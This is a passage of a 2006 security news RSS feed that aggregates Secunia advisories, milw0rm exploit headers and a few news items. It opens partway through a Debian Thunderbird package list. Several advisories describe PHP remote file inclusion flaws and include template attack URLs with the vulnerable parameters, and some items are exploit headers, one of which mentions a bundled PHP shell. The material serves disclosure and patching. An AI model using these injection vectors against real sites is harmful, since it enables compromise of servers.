Size/MD5 checksum: 3280524 68041a19610600cd691914971d72e915<br>
http://security.debian.org/pool/updat...ector_1.0.2-2.sarge1.0.8b.1_amd64.deb<br>
Size/MD5 checksum: 150580 d4cd554373b8cf9695e11b172ccd018c<br>
http://security.debian.org/pool/updat...fline_1.0.2-2.sarge1.0.8b.1_amd64.deb<br>
Size/MD5 checksum: 33032 5c7cc39d0f91f8cbd7dfbcd62f5233ea<br>
http://security.debian.org/pool/updat...dfind_1.0.2-2.sarge1.0.8b.1_amd64.deb<br>
Size/MD5 checksum: 88794 ef6eb382de91c862944b1486e5c343a7<br>
<br>
ARM architecture:<br>
<br>
http://security.debian.org/pool/updat...derbird_1.0.2-2.sarge1.0.8b.1_arm.deb<br>
Size/MD5 checksum: 10342700 42ebac688dbc2943768353f381c48af5<br>
http://security.debian.org/pool/updat...ird-dev_1.0.2-2.sarge1.0.8b.1_arm.deb<br>
Size/MD5 checksum: 3271408 8d1d920dbc27c50d3cef51653ae67571<br>
http://security.debian.org/pool/updat...spector_1.0.2-2.sarge1.0.8b.1_arm.deb<br>
Size/MD5 checksum: 142784 14df28e047604532f99d28d57fd66555<br>
http://security.debian.org/pool/updat...offline_1.0.2-2.sarge1.0.8b.1_arm.deb<br>
Size/MD5 checksum: 33052 441a28a0673a0b4a341ea3d2685ef7a7<br>
http://security.debian.org/pool/updat...eadfind_1.0.2-2.sarge1.0.8b.1_arm.deb<br>
Size/MD5 checksum: 80852 608e1e053e2bfd73099f6e853cdc3b11<br>
<br>
Intel IA-32 architecture:<br>
<br>
http://security.debian.org/pool/updat...erbird_1.0.2-2.sarge1.0.8b.1_i386.deb<br>
Size/MD5 checksum: 11563882 b41abc362fc0ed424a3a4cd6c4fa8ca6<br>
http://security.debian.org/pool/updat...rd-dev_1.0.2-2.sarge1.0.8b.1_i386.deb<br>
Size/MD5 checksum: 3507108 6c5268e655733613500ee2173f1012ec<br>
http://security.debian.org/pool/updat...pector_1.0.2-2.sarge1.0.8b.1_i386.deb<br>
Size/MD5 checksum: 146250 ba9d20e519d188c237b4b7cef17d3bbe<br>
http://security.debian.org/pool/updat...ffline_1.0.2-2.sarge1.0.8b.1_i386.deb<br>
Size/MD5 checksum: 33052 ef87f87b1ec09d8b1e66591e69895233<br>
http://security.debian.org/pool/updat...adfind_1.0.2-2.sarge1.0.8b.1_i386.deb<br>
Size/MD5 checksum: 87606 925e4a236ba4230a8e32216a064c3f06<br>
<br>
Intel IA-64 architecture:<br>
<br>
http://security.debian.org/pool/updat...erbird_1.0.2-2.sarge1.0.8b.1_ia64.deb<br>
Size/MD5 checksum: 14624106 a3b234485952ea02ccfdd68133a2cf35<br>
http://security.debian.org/pool/updat...rd-dev_1.0.2-2.sarge1.0.8b.1_ia64.deb<br>
Size/MD5 checksum: 3291038 a15a8ff3fbc471ed4969bb86e67c3c4c<br>
http://security.debian.org/pool/updat...pector_1.0.2-2.sarge1.0.8b.1_ia64.deb<br>
Size/MD5 checksum: 154934 96ab243eb1e9340a6c04743d761febe8<br>
http://security.debian.org/pool/updat...ffline_1.0.2-2.sarge1.0.8b.1_ia64.deb<br>
Size/MD5 checksum: 33034 ef4ff45411db444879bd8171814989e0<br>
http://security.debian.org/pool/updat...adfind_1.0.2-2.sarge1.0.8b.1_ia64.deb<br>
Size/MD5 checksum: 106730 975838d769c3c4e9821ee2f2db1f180a<br>
<br>
HP Precision architecture:<br>
<br>
http://security.debian.org/pool/updat...erbird_1.0.2-2.sarge1.0.8b.1_hppa.deb<br>
Size/MD5 checksum: 13565080 e4e770db9c3257e4082f6ba9a4b17942<br>
http://security.debian.org/pool/updat...rd-dev_1.0.2-2.sarge1.0.8b.1_hppa.deb<br>
Size/MD5 checksum: 3284790 cd7b3d8fa65712084108545b06bf5cf8<br>
http://security.debian.org/pool/updat...pector_1.0.2-2.sarge1.0.8b.1_hppa.deb<br>
Size/MD5 checksum: 152812 a850d4bbfc5412356adb8999e4afd3a2<br>
http://security.debian.org/pool/updat...ffline_1.0.2-2.sarge1.0.8b.1_hppa.deb<br>
Size/MD5 checksum: 33046 4b2d523df0b35eaf49c2ee670040a746<br>
http://security.debian.org/pool/updat...adfind_1.0.2-2.sarge1.0.8b.1_hppa.deb<br>
Size/MD5 checksum: 96926 49c2664125f88dcbcf8fc370490f1783<br>
<br>
Motorola 680x0 architecture:<br>
<br>
http://security.debian.org/pool/updat...erbird_1.0.2-2.sarge1.0.8b.1_m68k.deb<br>
Size/MD5 checksum: 10791242 efe7adeef2105ee962f60eb09d32be04<br>
http://security.debian.org/pool/updat...rd-dev_1.0.2-2.sarge1.0.8b.1_m68k.deb<br>
Size/MD5 checksum: 3270798 a64399e4e34ec761ddb064e650432d47<br>
http://security.debian.org/pool/updat...pector_1.0.2-2.sarge1.0.8b.1_m68k.deb<br>
Size/MD5 checksum: 144566 c368a1f6bda4a639c799903d3bed7c86<br>
http://security.debian.org/pool/updat...ffline_1.0.2-2.sarge1.0.8b.1_m68k.deb<br>
Size/MD5 checksum: 33066 3992b0cab96e959ecea687899f8ef05f<br>
http://security.debian.org/pool/updat...adfind_1.0.2-2.sarge1.0.8b.1_m68k.deb<br>
Size/MD5 checksum: 82094 b13852c78fa4f46ff993f3c1e98680dc<br>
<br>
Big endian MIPS architecture:<br>
<br>
http://security.debian.org/pool/updat...erbird_1.0.2-2.sarge1.0.8b.1_mips.deb<br>
Size/MD5 checksum: 11943796 cb93a2f2fc4dd706defeaea3c18a6b6f<br>
http://security.debian.org/pool/updat...rd-dev_1.0.2-2.sarge1.0.8b.1_mips.deb<br>
Size/MD5 checksum: 3278794 9acf4f9583972ed1fe2d453e8330233b<br>
http://security.debian.org/pool/updat...pector_1.0.2-2.sarge1.0.8b.1_mips.deb<br>
Size/MD5 checksum: 147496 07472047d17dabe204412c357bb21169<br>
http://security.debian.org/pool/updat...ffline_1.0.2-2.sarge1.0.8b.1_mips.deb<br>
Size/MD5 checksum: 33042 b7f0219fc847c1a52b3336aea10b1523<br>
http://security.debian.org/pool/updat...adfind_1.0.2-2.sarge1.0.8b.1_mips.deb<br>
Size/MD5 checksum: 84296 de6058169bdcaac13f4e44e50d86fcfa<br>
<br>
Little endian MIPS architecture:<br>
<br>
http://security.debian.org/pool/updat...bird_1.0.2-2.sarge1.0.8b.1_mipsel.deb<br>
Size/MD5 checksum: 11811180 7a90700b755f8a9628743c00c5658e01<br>
http://security.debian.org/pool/updat...-dev_1.0.2-2.sarge1.0.8b.1_mipsel.deb<br>
Size/MD5 checksum: 3279738 b7599c5e7cb743cfe02f60402beeef4c<br>
http://security.debian.org/pool/updat...ctor_1.0.2-2.sarge1.0.8b.1_mipsel.deb<br>
Size/MD5 checksum: 147050 e648ba4dcabf8cd85415d259d19f9dc5<br>
http://security.debian.org/pool/updat...line_1.0.2-2.sarge1.0.8b.1_mipsel.deb<br>
Size/MD5 checksum: 33034 9892f5d7755b7b013b825acf7d239b9a<br>
http://security.debian.org/pool/updat...find_1.0.2-2.sarge1.0.8b.1_mipsel.deb<br>
Size/MD5 checksum: 84184 08802c45278f5d135118b15c261d60ff<br>
<br>
PowerPC architecture:<br>
<br>
http://security.debian.org/pool/updat...ird_1.0.2-2.sarge1.0.8b.1_powerpc.deb<br>
Size/MD5 checksum: 10908332 b4899f52b0b1555eef1a52e29f7ccff0<br>
http://security.debian.org/pool/updat...dev_1.0.2-2.sarge1.0.8b.1_powerpc.deb<br>
Size/MD5 checksum: 3269376 138a349de0a5a33317fb12e38fa7048d<br>
http://security.debian.org/pool/updat...tor_1.0.2-2.sarge1.0.8b.1_powerpc.deb<br>
Size/MD5 checksum: 144570 8a5fbabc69454577f95fca69d6922183<br>
http://security.debian.org/pool/updat...ine_1.0.2-2.sarge1.0.8b.1_powerpc.deb<br>
Size/MD5 checksum: 33046 eab66e527293d35eeec5a2aa21e34988<br>
http://security.debian.org/pool/updat...ind_1.0.2-2.sarge1.0.8b.1_powerpc.deb<br>
Size/MD5 checksum: 80956 110bbacc7e5b85d32966e8b095d18e49<br>
<br>
IBM S/390 architecture:<br>
<br>
http://security.debian.org/pool/updat...erbird_1.0.2-2.sarge1.0.8b.1_s390.deb<br>
Size/MD5 checksum: 12701528 e77cc46c7784b4678e00158c4067fb13<br>
http://security.debian.org/pool/updat...rd-dev_1.0.2-2.sarge1.0.8b.1_s390.deb<br>
Size/MD5 checksum: 3279814 9f614f520b7d24b584b4dfdde4d6856c<br>
http://security.debian.org/pool/updat...pector_1.0.2-2.sarge1.0.8b.1_s390.deb<br>
Size/MD5 checksum: 150872 8ec4f9059a17b2e75afd8cb472dfd7d4<br>
http://security.debian.org/pool/updat...ffline_1.0.2-2.sarge1.0.8b.1_s390.deb<br>
Size/MD5 checksum: 33030 1a9dd5360add1b5c7d3940e44efc72f4<br>
http://security.debian.org/pool/updat...adfind_1.0.2-2.sarge1.0.8b.1_s390.deb<br>
Size/MD5 checksum: 88798 c1fc3eda5995f50df821da0913447ffa<br>
<br>
Sun Sparc architecture:<br>
<br>
http://security.debian.org/pool/updat...rbird_1.0.2-2.sarge1.0.8b.1_sparc.deb<br>
Size/MD5 checksum: 11176418 d9291799bae4c157fe7f0a9dd86ebcf4<br>
http://security.debian.org/pool/updat...d-dev_1.0.2-2.sarge1.0.8b.1_sparc.deb<br>
Size/MD5 checksum: 3275086 2a78bb9f76059b034dd1232cdd82dee6<br>
http://security.debian.org/pool/updat...ector_1.0.2-2.sarge1.0.8b.1_sparc.deb<br>
Size/MD5 checksum: 144214 0f03b8b13d7cb6ae6c0eebbec1da6d2b<br>
http://security.debian.org/pool/updat...fline_1.0.2-2.sarge1.0.8b.1_sparc.deb<br>
Size/MD5 checksum: 33056 4b9864766f12b2328b9e6fdfd98a4d0e<br>
http://security.debian.org/pool/updat...dfind_1.0.2-2.sarge1.0.8b.1_sparc.deb<br>
Size/MD5 checksum: 82648 c02d426a3ab8f7e704f946d0b0fee7c8<br>
<br>
-- Debian GNU/Linux unstable alias sid --<br>
<br>
Fixed in version 1.5.0.5-1.<br>
<br>
Original Advisory:<br>
http://www.us.debian.org/security/2006/dsa-1159<br>
<br>
Other References:<br>
SA19873:<br>
http://secunia.com/advisories/19873/<br>
<br>
SA20382:<br>
http://secunia.com/advisories/20382/<br>
<br>
SA21228:<br>
http://secunia.com/advisories/21228/<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/21654/</link>
            <pubDate>Mon, 28 Aug 2006 08:11:09 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: Ay System WCS &quot;path[ShowProcessHandle]&quot; File Inclusion</title>
            <description><![CDATA[Secunia Advisory:   	 SA21661  	  <br>
Release Date: 	2006-08-28<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Unpatched<br>
<br>
Software:	Ay System WCS 2.x<br>
<br>
<br>
Description:<br>
SHiKaA has discovered some vulnerabilities in Ay System WCS, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
Input passed to the "path[ShowProcessHandle]" parameter in multiple files is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.<br>
<br>
Examples:<br>
http://[host]/manage/template/standard/main.php?path[ShowProcessHandle]=[file]<br>
http://[host]/manage/template/standard/home.php?path[ShowProcessHandle]=[file]<br>
http://[host]/manage/template/standard/impressum.php?path[ShowProcessHandle]=[file]<br>
<br>
Successful exploitation requires that "register_globals" is enabled.<br>
<br>
The vulnerabilities have been confirmed in version 2.6. Other versions may also be affected.<br>
<br>
Solution:<br>
Edit the source code to ensure that input is properly verified.<br>
<br>
Provided and/or discovered by:<br>
SHiKaA<br>
<br>
Original Advisory:<br>
http://milw0rm.com/exploits/2263]]></description>
            <link>http://secunia.com/advisories/21661/</link>
            <pubDate>Mon, 28 Aug 2006 08:10:25 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: AlberT-EasySite &quot;PSA_PATH&quot; File Inclusion Vulnerability</title>
            <description><![CDATA[Secunia Advisory:   	 SA21651  	  <br>
Release Date: 	2006-08-28<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Unpatched<br>
<br>
Software:	AlberT-EasySite 1.x<br>
<br>
<br>
Description:<br>
Kacper has reported a vulnerability in AlberT-EasySite, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
Input passed to the "PSA_PATH" parameter in AES/modules/auth/phpsecurityadmin/include/logout.php is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.<br>
<br>
Successful exploitation requires that "register_globals" is enabled.<br>
<br>
The vulnerability has been reported in version 1.0a5. Other versions may also be affected.<br>
<br>
Solution:<br>
Edit the source code to ensure that input is properly verified.<br>
<br>
Set "register_globals" to "Off".<br>
<br>
Provided and/or discovered by:<br>
Kacper<br>
<br>
Original Advisory:<br>
http://milw0rm.com/exploits/2260<br>
]]></description>
            <link>http://secunia.com/advisories/21651/</link>
            <pubDate>Mon, 28 Aug 2006 08:09:54 -0400</pubDate>
        </item>

        <item>
            <title> Man Gets 6 Years for Software Piracy</title>
            <description>&quot;In what prosecutors are calling 'the ultimate case', a Florida man has been sentenced to six years in prison for selling illegal copies of computer programs. From the article: 'Danny Ferrer, of Lakeland, Fla., pleaded guilty in June to conspiracy and copyright infringement charges after an FBI investigation of his Web site, BuysUSA.com. Ferrer also was ordered to pay more than $4.1 million in restitution to software makers Adobe Systems Inc., Autodesk, and Macromedia Inc.' The judge ordered that items he bought with the money, including airplanes, a Lamborghini and other cars, be sold off to pay for the restitution.&quot;&lt;br&gt;</description>
            <link>http://yro.slashdot.org/article.pl?sid=06/08/25/1724249&amp;from=rss</link>
            <pubDate>Fri, 25 Aug 2006 16:17:38 -0400</pubDate>
        </item>

        <item>
            <title>Phaos -= 0.9.2 basename() Remote Command Execution Exploit</title>
            <description><![CDATA[#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br>
#+<br>
#-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -<br>
#+<br>
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br>
#+<br>
#- Phaos <= 0.9.2 basename() Remote Command Execution Exploit<br>
#+<br>
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br>
#+<br>
#- [Script name: Phaos v. 0.9.2<br>
#- [Script site: http://sourceforge.net/projects/phaosrpg/<br>
#+<br>
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br>
#+<br>
#-          Find by: Kacper (a.k.a Rahim)<br>
#+		  <br>
#-          Contact: kacper1964@yahoo.pl   <br>
#-                        or   <br>
#-          http://www.devilteam.yum.pl/<br>
#-                       and <br>
#-           http://www.rahim.webd.pl/<br>
#+<br>
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br>
#+<br>
#- Special Greetz: DragonHeart ;-)<br>
#- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi<br>
#-<br>
#!@ Przyjazni nie da sie zamienic na marne korzysci @!<br>
#+<br>
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br>
#+<br>
#-            Z Dedykacja dla osoby,<br>
#-         bez ktorej nie mogl bym zyc...<br>
#-           K.C:* J.M (a.k.a Magaja)<br>
#+<br>
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]]></description>
            <link>http://www.milw0rm.com/exploits/2253</link>
            <pubDate>Fri, 25 Aug 2006 16:16:15 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: phpCOIN 1.2.3 (_CCFG[_PKG_PATH_INCL]) Remote Include Vulnerability</title>
            <description><![CDATA[phpCOIN 1.2.3 (_CCFG[_PKG_PATH_INCL]) Remote Include Vulnerability<br>
<br>
##################################################################<br>
<br>
Discovered by: Timq<br>
http://www.securitydb.org<br>
##################################################################<br>
<br>
Email: timq[at]hackernetwork[dot]com<br>
<br>
http://www.securitydb.org<br>
##################################################################]]></description>
            <link>http://www.milw0rm.com/exploits/2254</link>
            <pubDate>Fri, 25 Aug 2006 16:15:23 -0400</pubDate>
        </item>

        <item>
            <title>AIX mkvg Insecure Program Execution Vulnerability</title>
            <description><![CDATA[Secunia Advisory:   	 SA21620  	  <br>
Release Date: 	2006-08-25<br>
<br>
Critical: 	<br>
Less critical<br>
Impact: 	Privilege escalation<br>
Where: 	Local system<br>
Solution Status: 	Vendor Patch<br>
<br>
OS:	AIX 5.x<br>
<br>
<br>
Description:<br>
A security issue has been reported in AIX, which can be exploited by malicious, local users to gain escalated privileges.<br>
<br>
The problem is that mkvg invokes various other programs (chdev, mkboot, varyonvg, and varyoffvg) without absolute pathnames. This may be exploited to execute arbitrary code with the privileges of a user running mkvg by placing a malicious program in the path.<br>
<br>
Solution:<br>
Apply APARs.<br>
<br>
AIX 5.3:<br>
Apply APAR IY88699.<br>
<br>
AIX 5.2:<br>
Apply APAR IY88737.<br>
<br>
Provided and/or discovered by:<br>
Reported by the vendor.<br>
<br>
Original Advisory:<br>
IBM:<br>
http://www-1.ibm.com/support/docview.wss?uid=isg1IY88699<br>
http://www-1.ibm.com/support/docview.wss?uid=isg1IY88737]]></description>
            <link>http://secunia.com/advisories/21620/</link>
            <pubDate>Fri, 25 Aug 2006 16:14:35 -0400</pubDate>
        </item>

        <item>
            <title>SGI Advanced Linux Environment Multiple Updates</title>
            <description><![CDATA[Secunia Advisory:   	 SA21598  	  <br>
Release Date: 	2006-08-25<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	Security Bypass<br>
Cross Site Scripting<br>
DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
OS:	SGI Advanced Linux Environment 3<br>
<br>
CVE reference:	CVE-2006-3459 (Secunia mirror)<br>
CVE-2006-3460 (Secunia mirror)<br>
CVE-2006-3461 (Secunia mirror)<br>
CVE-2006-3462 (Secunia mirror)<br>
CVE-2006-3463 (Secunia mirror)<br>
CVE-2006-3464 (Secunia mirror)<br>
CVE-2006-3465 (Secunia mirror)<br>
CVE-2006-3627 (Secunia mirror)<br>
CVE-2006-3628 (Secunia mirror)<br>
CVE-2006-3629 (Secunia mirror)<br>
CVE-2006-3630 (Secunia mirror)<br>
CVE-2006-3631 (Secunia mirror)<br>
CVE-2006-3632 (Secunia mirror)<br>
CVE-2006-3694 (Secunia mirror)<br>
CVE-2006-3746 (Secunia mirror)<br>
CVE-2006-3918 (Secunia mirror)<br>
<br>
<br>
Description:<br>
SGI has issued a patch for SGI Advanced Linux Environment. This fixes some vulnerabilities, which can be exploited by malicious people to conduct cross-site scripting attacks, bypass certain security restrictions, cause a DoS (Denial of Service), and potentially compromise a vulnerable system.<br>
<br>
For more information:<br>
SA21236<br>
SA21290<br>
SA21300<br>
SA21399<br>
SA21488<br>
<br>
Solution:<br>
Apply patch 10326 for SGI ProPack 3 Service Pack 6.<br>
http://support.sgi.com/<br>
<br>
Original Advisory:<br>
ftp://patches.sgi.com/support/free/security/advisories/20060801-01-P.asc<br>
<br>
Other References:<br>
SA21236:<br>
http://secunia.com/advisories/21236/<br>
<br>
SA21290:<br>
http://secunia.com/advisories/21290/<br>
<br>
SA21300:<br>
http://secunia.com/advisories/21300/<br>
<br>
SA21399:<br>
http://secunia.com/advisories/21399/<br>
<br>
SA21488:<br>
http://secunia.com/advisories/21488/]]></description>
            <link>http://secunia.com/advisories/21598/</link>
            <pubDate>Fri, 25 Aug 2006 16:14:03 -0400</pubDate>
        </item>

        <item>
            <title>Sun Solaris update for mozilla</title>
            <description><![CDATA[Sun Solaris update for mozilla   	 Advisory Available in Danish <br>
<br>
Secunia Advisory: 	SA21622 	 <br>
Release Date: 	2006-08-25<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	Security Bypass<br>
Cross Site Scripting<br>
Exposure of sensitive information<br>
DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Workaround<br>
<br>
OS:	Sun Solaris 10<br>
Sun Solaris 8<br>
Sun Solaris 9<br>
<br>
<br>
Description:<br>
Sun has acknowledged some vulnerabilities in mozilla for Sun Solaris. These can be exploited by malicious people to bypass certain security restrictions, disclose sensitive information, conduct cross-site scripting and phishing attacks, and compromise a vulnerable system.<br>
<br>
For more information:<br>
SA17944<br>
SA18700<br>
SA18703<br>
SA19649<br>
<br>
Solution:<br>
Apply patches.<br>
<br>
-- SPARC Platform --<br>
<br>
Mozilla 1.7 for (Solaris 10):<br>
Apply patch 119115-19 or later.<br>
<br>
-- x86 Platform --<br>
<br>
Mozilla 1.7 for (Solaris 10):<br>
Apply patch 119116-19 or later.<br>
<br>
A final resolution is pending completion for other versions. See the vendor's advisory for various workarounds.<br>
<br>
Original Advisory:<br>
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102550-1<br>
<br>
Other References:<br>
SA19649:<br>
http://secunia.com/advisories/19649/<br>
<br>
SA17944:<br>
http://secunia.com/advisories/17944/<br>
<br>
SA18700:<br>
http://secunia.com/advisories/18700/<br>
<br>
SA18703:<br>
http://secunia.com/advisories/18703/<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/21622/</link>
            <pubDate>Fri, 25 Aug 2006 16:13:26 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: phpCOIN &quot;_CCFG[_PKG_PATH_INCL]&quot; File Inclusion</title>
            <description><![CDATA[Secunia Advisory:   	 SA21624  	  <br>
Release Date: 	2006-08-25<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Unpatched<br>
<br>
Software:	phpCOIN 1.x<br>
<br>
<br>
Description:<br>
Timq has discovered some vulnerabilities in phpCOIN, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
Input passed to the "_CCFG[_PKG_PATH_INCL]" parameter in multiple files is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.<br>
<br>
Examples:<br>
http://[host]/coin_includes/api.php?_CCFG[_PKG_PATH_INCL]=[file]<br>
http://[host]/coin_includes/common.php?_CCFG[_PKG_PATH_INCL]=[file]<br>
http://[host]/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=[file]<br>
http://[host]/coin_includes/core.php?_CCFG[_PKG_PATH_INCL]=[file]<br>
http://[host]/coin_includes/custom.php?_CCFG[_PKG_PATH_INCL]=[file]<br>
http://[host]/coin_includes/db.php?_CCFG[_PKG_PATH_INCL]=[file]<br>
http://[host]/coin_includes/redirect.php?_CCFG[_PKG_PATH_INCL]=[file]<br>
http://[host]/coin_includes/session_set.php?_CCFG[_PKG_PATH_INCL]=[file]<br>
<br>
Successful exploitation requires that "register_globals" is enabled.<br>
<br>
The vulnerabilities have been confirmed in version 1.2.3. Other versions may also be affected.<br>
<br>
Solution:<br>
Edit the source code to ensure that input is properly verified.<br>
<br>
Provided and/or discovered by:<br>
Timq<br>
<br>
Original Advisory:<br>
http://milw0rm.com/exploits/2254<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/21624/</link>
            <pubDate>Fri, 25 Aug 2006 16:12:53 -0400</pubDate>
        </item>

        <item>
            <title>Problems with Intel wireless drivers</title>
            <description>Workaround for sluggishness</description>
            <link>http://isc.sans.org/diary.php?storyid=1633</link>
            <pubDate>Thu, 24 Aug 2006 10:25:04 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability</title>
            <description><![CDATA[############################################################<br>
<br>
pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability<br>
<br>
############################################################<br>
<br>
#Author: XORON<br>
<br>
############################################################<br>
<br>
#Class: Remote<br>
<br>
############################################################<br>
<br>
#cont@ct: x0r0n[at]hotmail[dot]com<br>
<br>
############################################################]]></description>
            <link>http://www.milw0rm.com/exploits/2249</link>
            <pubDate>Thu, 24 Aug 2006 09:45:04 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: Integramod Portal -= 2.x (functions_portal.php) Remote Include Exploit</title>
            <description>
# Method found and exploit scripted by nukedx&lt;br&gt;
# Contacts&gt; ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: nukedx@nukedx.com&lt;br&gt;
# Original advisory can be found at: http://www.nukedx.com/?viewdoc=47&lt;br&gt;
# &lt;br&gt;
# Integramod Portal &lt;= 2.x Remote Command Execution Exploit&lt;br&gt;
# &lt;br&gt;
# This exploit comes with it's own php shell setting. If you wanna change it your file must contain this data &gt;&lt;br&gt;
#</description>
            <link>http://www.milw0rm.com/exploits/2250</link>
            <pubDate>Thu, 24 Aug 2006 09:44:28 -0400</pubDate>
        </item>

        <item>
            <title>The Gromozon Rootkit: What you need to know</title>
            <description>If you haven't heard of Gromozon, you haven't lived. Then again, you probably haven't had your PC french-fried yet either. It's a horrendously nasty hack doing the rounds - there's Adware, there's Rootkits, there's...oh God, all kinds of really hideous stuff in there. You really should do yourself a favour and read this document. It's a PDF, fact fans.</description>
            <link>http://www.vitalsecurity.org/2006/08/gromozon-rootkit-what-you-need-to-know.html</link>
            <pubDate>Thu, 24 Aug 2006 09:38:52 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: VistaBB &quot;phpbb_root_path&quot; File Inclusion Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:	SA21602	Print Advisory  <br>
Release Date:	2006-08-24<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	System access<br>
Where:	From remote<br>
Solution Status:	Unpatched<br>
<br>
Software:	VistaBB 2.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
Mustafa Can Bjorn has discovered some vulnerabilities in VistaBB, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
Input passed to the "phpbb_root_path" parameter in includes/functions_mod_user.php and includes/functions_portal.php is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.<br>
<br>
Successful exploitation requires that "register_globals" is enabled.<br>
<br>
The vulnerabilities have been confirmed in version 2.0.33. Other versions may also be affected.<br>
<br>
Solution:<br>
Edit the source code to ensure that input is properly verified.<br>
<br>
Provided and/or discovered by:<br>
Mustafa Can Bjorn<br>
<br>
Original Advisory:<br>
http://www.nukedx.com/?viewdoc=48<br>
]]></description>
            <link>http://secunia.com/advisories/21602/</link>
            <pubDate>Thu, 24 Aug 2006 09:37:51 -0400</pubDate>
        </item>

        <item>
            <title>Cisco Firewall Products Unintentional Password Modification</title>
            <description><![CDATA[Secunia Advisory:	SA21616	Print Advisory  <br>
Release Date:	2006-08-24<br>
<br>
Critical:	<br>
Moderately critical<br>
Impact:	Security Bypass<br>
Where:	From remote<br>
Solution Status:	Vendor Patch<br>
<br>
OS:	Cisco Adaptive Security Appliance (ASA) 7.x<br>
Cisco PIX 7.x<br>
<br>
Software:	Cisco Firewall Services Module (FWSM) 1.x<br>
Cisco Firewall Services Module (FWSM) 2.x<br>
Cisco Firewall Services Module (FWSM) 3.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
A security issue has been reported in various Cisco Firewall products, which may allow malicious people to bypass certain security restrictions.<br>
<br>
The problem is caused due to an error resulting in certain passwords (EXEC password, passwords of locally defined usernames, and the enable password in the start-up configuration) being unintentionally changed to a non-random value without user intervention.<br>
<br>
The error may happen during a software crash or multiple users configuring a device at the same time.<br>
<br>
This may result in users being locked out or lead to unauthorised access to an affected device.<br>
<br>
Solution:<br>
Update to a fixed version (see the vendor's advisory for details).<br>
<br>
Provided and/or discovered by:<br>
The vendor credits Terje Bless, Helse Nord IKT.<br>
]]></description>
            <link>http://secunia.com/advisories/21616/</link>
            <pubDate>Thu, 24 Aug 2006 09:37:20 -0400</pubDate>
        </item>

        <item>
            <title>Cisco VPN 3000 Concentrator FTP Management Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:	SA21617	Print Advisory  <br>
Release Date:	2006-08-24<br>
<br>
Critical:	<br>
Less critical<br>
Impact:	Security Bypass<br>
Where:	From local network<br>
Solution Status:	Vendor Patch<br>
<br>
OS:	Cisco VPN 3000 Concentrator<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
Two vulnerabilities have been reported in Cisco VPN 3000 Concentrator, which can be exploited by malicious people to bypass certain security restrictions.<br>
<br>
The vulnerabilities are caused due to unspecified errors when using FTP as a management protocol and can be exploited to run the "CWD", "MKD", "CDUP", "RNFR", "SIZE", and "RMD" commands without being authenticated. This can e.g. be exploited to delete configuration files and certificates on the device.<br>
<br>
Successful exploitation requires that the device has been configured to use FTP as a management protocol (default setting).<br>
<br>
The vulnerabilities affect models 3005, 3015, 3020, 3030, 3060, and 3080 running the following versions:<br>
* Any version prior to 4.1<br>
* Any 4.1.x version prior to, and including, 4.1(7)L<br>
* Any 4.7.x version prior to, and including, 4.7(2)F<br>
<br>
Solution:<br>
Update to version 4.1(7)M or 4.7(2)G.<br>
http://www.cisco.com/pcgi-bin/tablebuild.pl/vpn3000-3des?psrtdcat20e2<br>
<br>
Network security best practises recommend restricting access to the FTP service (or disabling it if not needed to manage the VPN 3000 concentrator).<br>
<br>
Provided and/or discovered by:<br>
The vendor credits NCC Group.<br>
<br>
Original Advisory:<br>
http://www.cisco.com/warp/public/707/cisco-sa-20060823-vpn3k.shtml]]></description>
            <link>http://secunia.com/advisories/21617/</link>
            <pubDate>Thu, 24 Aug 2006 09:36:49 -0400</pubDate>
        </item>

        <item>
            <title>Wireshark Multiple Vulnerabilities</title>
